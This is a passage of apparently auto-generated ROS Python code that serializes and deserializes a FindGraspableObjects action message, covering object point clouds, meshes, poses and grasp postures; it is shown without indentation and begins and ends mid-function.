_x = self.action_feedback.feedback.object.object.point_cluster.is_dense
buff.write(_get_struct_B().pack(_x))
length = len(self.action_feedback.feedback.object.object.primitives)
buff.write(_struct_I.pack(length))
for val1 in self.action_feedback.feedback.object.object.primitives:
_x = val1.type
buff.write(_get_struct_B().pack(_x))
length = len(val1.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val1.dimensions))
length = len(self.action_feedback.feedback.object.object.primitive_poses)
buff.write(_struct_I.pack(length))
for val1 in self.action_feedback.feedback.object.object.primitive_poses:
_v51 = val1.position
_x = _v51
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v52 = val1.orientation
_x = _v52
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.action_feedback.feedback.object.object.meshes)
buff.write(_struct_I.pack(length))
for val1 in self.action_feedback.feedback.object.object.meshes:
length = len(val1.triangles)
buff.write(_struct_I.pack(length))
for val2 in val1.triangles:
buff.write(_get_struct_3I().pack(*val2.vertex_indices))
length = len(val1.vertices)
buff.write(_struct_I.pack(length))
for val2 in val1.vertices:
_x = val2
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
length = len(self.action_feedback.feedback.object.object.mesh_poses)
buff.write(_struct_I.pack(length))
for val1 in self.action_feedback.feedback.object.object.mesh_poses:
_v53 = val1.position
_x = _v53
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v54 = val1.orientation
_x = _v54
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
buff.write(_get_struct_4d().pack(*self.action_feedback.feedback.object.object.surface.coef))
length = len(self.action_feedback.feedback.object.grasps)
buff.write(_struct_I.pack(length))
for val1 in self.action_feedback.feedback.object.grasps:
_x = val1.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v55 = val1.pre_grasp_posture
_v56 = _v55.header
_x = _v56.seq
buff.write(_get_struct_I().pack(_x))
_v57 = _v56.stamp
_x = _v57
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v56.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(_v55.joint_names)
buff.write(_struct_I.pack(length))
for val3 in _v55.joint_names:
length = len(val3)
if python3 or type(val3) == unicode:
val3 = val3.encode('utf-8')
length = len(val3)
buff.write(struct.Struct('<I%ss'%length).pack(length, val3))
length = len(_v55.points)
buff.write(_struct_I.pack(length))
for val3 in _v55.points:
length = len(val3.positions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val3.positions))
length = len(val3.velocities)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val3.velocities))
length = len(val3.accelerations)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val3.accelerations))
length = len(val3.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val3.effort))
_v58 = val3.time_from_start
_x = _v58
buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
_v59 = val1.grasp_posture
_v60 = _v59.header
_x = _v60.seq
buff.write(_get_struct_I().pack(_x))
_v61 = _v60.stamp
_x = _v61
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v60.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(_v59.joint_names)
buff.write(_struct_I.pack(length))
for val3 in _v59.joint_names:
length = len(val3)
if python3 or type(val3) == unicode:
val3 = val3.encode('utf-8')
length = len(val3)
buff.write(struct.Struct('<I%ss'%length).pack(length, val3))
length = len(_v59.points)
buff.write(_struct_I.pack(length))
for val3 in _v59.points:
length = len(val3.positions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val3.positions))
length = len(val3.velocities)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val3.velocities))
length = len(val3.accelerations)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val3.accelerations))
length = len(val3.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val3.effort))
_v62 = val3.time_from_start
_x = _v62
buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
_v63 = val1.grasp_pose
_v64 = _v63.header
_x = _v64.seq
buff.write(_get_struct_I().pack(_x))
_v65 = _v64.stamp
_x = _v65
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v64.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v66 = _v63.pose
_v67 = _v66.position
_x = _v67
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v68 = _v66.orientation
_x = _v68
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
_x = val1.grasp_quality
buff.write(_get_struct_d().pack(_x))
_v69 = val1.pre_grasp_approach
_v70 = _v69.direction
_v71 = _v70.header
_x = _v71.seq
buff.write(_get_struct_I().pack(_x))
_v72 = _v71.stamp
_x = _v72
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v71.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v73 = _v70.vector
_x = _v73
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_x = _v69
buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
_v74 = val1.post_grasp_retreat
_v75 = _v74.direction
_v76 = _v75.header
_x = _v76.seq
buff.write(_get_struct_I().pack(_x))
_v77 = _v76.stamp
_x = _v77
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v76.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v78 = _v75.vector
_x = _v78
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_x = _v74
buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
_v79 = val1.post_place_retreat
_v80 = _v79.direction
_v81 = _v80.header
_x = _v81.seq
buff.write(_get_struct_I().pack(_x))
_v82 = _v81.stamp
_x = _v82
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v81.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v83 = _v80.vector
_x = _v83
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_x = _v79
buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
_x = val1.max_contact_force
buff.write(_get_struct_f().pack(_x))
length = len(val1.allowed_touch_objects)
buff.write(_struct_I.pack(length))
for val2 in val1.allowed_touch_objects:
length = len(val2)
if python3 or type(val2) == unicode:
val2 = val2.encode('utf-8')
length = len(val2)
buff.write(struct.Struct('<I%ss'%length).pack(length, val2))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
codecs.lookup_error("rosmsg").msg_type = self._type
try:
if self.action_goal is None:
self.action_goal = grasping_msgs.msg.FindGraspableObjectsActionGoal()
if self.action_result is None:
self.action_result = grasping_msgs.msg.FindGraspableObjectsActionResult()
if self.action_feedback is None:
self.action_feedback = grasping_msgs.msg.FindGraspableObjectsActionFeedback()
end = 0
_x = self
start = end
end += 12
(_x.action_goal.header.seq, _x.action_goal.header.stamp.secs, _x.action_goal.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_goal.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_goal.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_goal.goal_id.stamp.secs, _x.action_goal.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_goal.goal_id.id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_goal.goal_id.id = str[start:end]
_x = self
start = end
end += 13
(_x.action_goal.goal.plan_grasps, _x.action_result.header.seq, _x.action_result.header.stamp.secs, _x.action_result.header.stamp.nsecs,) = _get_struct_B3I().unpack(str[start:end])
self.action_goal.goal.plan_grasps = bool(self.action_goal.goal.plan_grasps)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_result.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_result.status.goal_id.stamp.secs, _x.action_result.status.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.status.goal_id.id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_result.status.goal_id.id = str[start:end]
start = end
end += 1
(self.action_result.status.status,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.status.text = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_result.status.text = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_result.result.objects = []
for i in range(0, length):
val1 = grasping_msgs.msg.GraspableObject()
_v84 = val1.object
_v85 = _v84.header
start = end
end += 4
(_v85.seq,) = _get_struct_I().unpack(str[start:end])
_v86 = _v85.stamp
_x = _v86
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v85.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v85.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v84.name = str[start:end].decode('utf-8', 'rosmsg')
else:
_v84.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v84.support_surface = str[start:end].decode('utf-8', 'rosmsg')
else:
_v84.support_surface = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v84.properties = []
for i in range(0, length):
val3 = grasping_msgs.msg.ObjectProperty()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val3.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3.value = str[start:end].decode('utf-8', 'rosmsg')
else:
val3.value = str[start:end]
_v84.properties.append(val3)
_v87 = _v84.point_cluster
_v88 = _v87.header
start = end
end += 4
(_v88.seq,) = _get_struct_I().unpack(str[start:end])
_v89 = _v88.stamp
_x = _v89
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v88.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v88.frame_id = str[start:end]
_x = _v87
start = end
end += 8
(_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v87.fields = []
for i in range(0, length):
val4 = sensor_msgs.msg.PointField()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val4.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val4.name = str[start:end]
_x = val4
start = end
end += 9
(_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])
_v87.fields.append(val4)
_x = _v87
start = end
end += 9
(_x.is_bigendian, _x.point_step, _x.row_step,) = _get_struct_B2I().unpack(str[start:end])
_v87.is_bigendian = bool(_v87.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
_v87.data = str[start:end]
start = end
end += 1
(_v87.is_dense,) = _get_struct_B().unpack(str[start:end])
_v87.is_dense = bool(_v87.is_dense)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v84.primitives = []
for i in range(0, length):
val3 = shape_msgs.msg.SolidPrimitive()
start = end
end += 1
(val3.type,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.dimensions = s.unpack(str[start:end])
_v84.primitives.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v84.primitive_poses = []
for i in range(0, length):
val3 = geometry_msgs.msg.Pose()
_v90 = val3.position
_x = _v90
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v91 = val3.orientation
_x = _v91
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
_v84.primitive_poses.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v84.meshes = []
for i in range(0, length):
val3 = shape_msgs.msg.Mesh()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val3.triangles = []
for i in range(0, length):
val4 = shape_msgs.msg.MeshTriangle()
start = end
end += 12
val4.vertex_indices = _get_struct_3I().unpack(str[start:end])
val3.triangles.append(val4)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val3.vertices = []
for i in range(0, length):
val4 = geometry_msgs.msg.Point()
_x = val4
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
val3.vertices.append(val4)
_v84.meshes.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v84.mesh_poses = []
for i in range(0, length):
val3 = geometry_msgs.msg.Pose()
_v92 = val3.position
_x = _v92
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v93 = val3.orientation
_x = _v93
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
_v84.mesh_poses.append(val3)
_v94 = _v84.surface
start = end
end += 32
_v94.coef = _get_struct_4d().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.grasps = []
for i in range(0, length):
val2 = moveit_msgs.msg.Grasp()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2.id = str[start:end].decode('utf-8', 'rosmsg')
else:
val2.id = str[start:end]
_v95 = val2.pre_grasp_posture
_v96 = _v95.header
start = end
end += 4
(_v96.seq,) = _get_struct_I().unpack(str[start:end])
_v97 = _v96.stamp
_x = _v97
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v96.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v96.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v95.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val4 = str[start:end].decode('utf-8', 'rosmsg')
else:
val4 = str[start:end]
_v95.joint_names.append(val4)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v95.points = []
for i in range(0, length):
val4 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.positions = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.velocities = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.accelerations = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.effort = s.unpack(str[start:end])
_v98 = val4.time_from_start
_x = _v98
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
_v95.points.append(val4)
_v99 = val2.grasp_posture
_v100 = _v99.header
start = end
end += 4
(_v100.seq,) = _get_struct_I().unpack(str[start:end])
_v101 = _v100.stamp
_x = _v101
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v100.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v100.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v99.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val4 = str[start:end].decode('utf-8', 'rosmsg')
else:
val4 = str[start:end]
_v99.joint_names.append(val4)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v99.points = []
for i in range(0, length):
val4 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.positions = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.velocities = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.accelerations = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.effort = s.unpack(str[start:end])
_v102 = val4.time_from_start
_x = _v102
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
_v99.points.append(val4)
_v103 = val2.grasp_pose
_v104 = _v103.header
start = end
end += 4
(_v104.seq,) = _get_struct_I().unpack(str[start:end])
_v105 = _v104.stamp
_x = _v105
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v104.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v104.frame_id = str[start:end]
_v106 = _v103.pose
_v107 = _v106.position
_x = _v107
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v108 = _v106.orientation
_x = _v108
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
start = end
end += 8
(val2.grasp_quality,) = _get_struct_d().unpack(str[start:end])
_v109 = val2.pre_grasp_approach
_v110 = _v109.direction
_v111 = _v110.header
start = end
end += 4
(_v111.seq,) = _get_struct_I().unpack(str[start:end])
_v112 = _v111.stamp
_x = _v112
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v111.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v111.frame_id = str[start:end]
_v113 = _v110.vector
_x = _v113
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v109
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
_v114 = val2.post_grasp_retreat
_v115 = _v114.direction
_v116 = _v115.header
start = end
end += 4
(_v116.seq,) = _get_struct_I().unpack(str[start:end])
_v117 = _v116.stamp
_x = _v117
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v116.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v116.frame_id = str[start:end]
_v118 = _v115.vector
_x = _v118
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v114
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
_v119 = val2.post_place_retreat
_v120 = _v119.direction
_v121 = _v120.header
start = end
end += 4
(_v121.seq,) = _get_struct_I().unpack(str[start:end])
_v122 = _v121.stamp
_x = _v122
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v121.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v121.frame_id = str[start:end]
_v123 = _v120.vector
_x = _v123
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v119
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
start = end
end += 4
(val2.max_contact_force,) = _get_struct_f().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.allowed_touch_objects = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3 = str[start:end].decode('utf-8', 'rosmsg')
else:
val3 = str[start:end]
val2.allowed_touch_objects.append(val3)
val1.grasps.append(val2)
self.action_result.result.objects.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_result.result.support_surfaces = []
for i in range(0, length):
val1 = grasping_msgs.msg.Object()
_v124 = val1.header
start = end
end += 4
(_v124.seq,) = _get_struct_I().unpack(str[start:end])
_v125 = _v124.stamp
_x = _v125
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v124.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v124.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.support_surface = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.support_surface = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.properties = []
for i in range(0, length):
val2 = grasping_msgs.msg.ObjectProperty()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val2.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2.value = str[start:end].decode('utf-8', 'rosmsg')
else:
val2.value = str[start:end]
val1.properties.append(val2)
_v126 = val1.point_cluster
_v127 = _v126.header
start = end
end += 4
(_v127.seq,) = _get_struct_I().unpack(str[start:end])
_v128 = _v127.stamp
_x = _v128
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v127.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v127.frame_id = str[start:end]
_x = _v126
start = end
end += 8
(_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v126.fields = []
for i in range(0, length):
val3 = sensor_msgs.msg.PointField()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val3.name = str[start:end]
_x = val3
start = end
end += 9
(_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])
_v126.fields.append(val3)
_x = _v126
start = end
end += 9
(_x.is_bigendian, _x.point_step, _x.row_step,) = _get_struct_B2I().unpack(str[start:end])
_v126.is_bigendian = bool(_v126.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
_v126.data = str[start:end]
start = end
end += 1
(_v126.is_dense,) = _get_struct_B().unpack(str[start:end])
_v126.is_dense = bool(_v126.is_dense)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.primitives = []
for i in range(0, length):
val2 = shape_msgs.msg.SolidPrimitive()
start = end
end += 1
(val2.type,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val2.dimensions = s.unpack(str[start:end])
val1.primitives.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.primitive_poses = []
for i in range(0, length):
val2 = geometry_msgs.msg.Pose()
_v129 = val2.position
_x = _v129
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v130 = val2.orientation
_x = _v130
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
val1.primitive_poses.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.meshes = []
for i in range(0, length):
val2 = shape_msgs.msg.Mesh()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.triangles = []
for i in range(0, length):
val3 = shape_msgs.msg.MeshTriangle()
start = end
end += 12
val3.vertex_indices = _get_struct_3I().unpack(str[start:end])
val2.triangles.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
val2.vertices.append(val3)
val1.meshes.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.mesh_poses = []
for i in range(0, length):
val2 = geometry_msgs.msg.Pose()
_v131 = val2.position
_x = _v131
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v132 = val2.orientation
_x = _v132
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
val1.mesh_poses.append(val2)
_v133 = val1.surface
start = end
end += 32
_v133.coef = _get_struct_4d().unpack(str[start:end])
self.action_result.result.support_surfaces.append(val1)
_x = self
start = end
end += 12
(_x.action_feedback.header.seq, _x.action_feedback.header.stamp.secs, _x.action_feedback.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_feedback.status.goal_id.stamp.secs, _x.action_feedback.status.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.status.goal_id.id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.status.goal_id.id = str[start:end]
start = end
end += 1
(self.action_feedback.status.status,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.status.text = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.status.text = str[start:end]
_x = self
start = end
end += 12
(_x.action_feedback.feedback.object.object.header.seq, _x.action_feedback.feedback.object.object.header.stamp.secs, _x.action_feedback.feedback.object.object.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.feedback.object.object.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.feedback.object.object.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.feedback.object.object.name = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.feedback.object.object.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.feedback.object.object.support_surface = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.feedback.object.object.support_surface = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.properties = []
for i in range(0, length):
val1 = grasping_msgs.msg.ObjectProperty()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
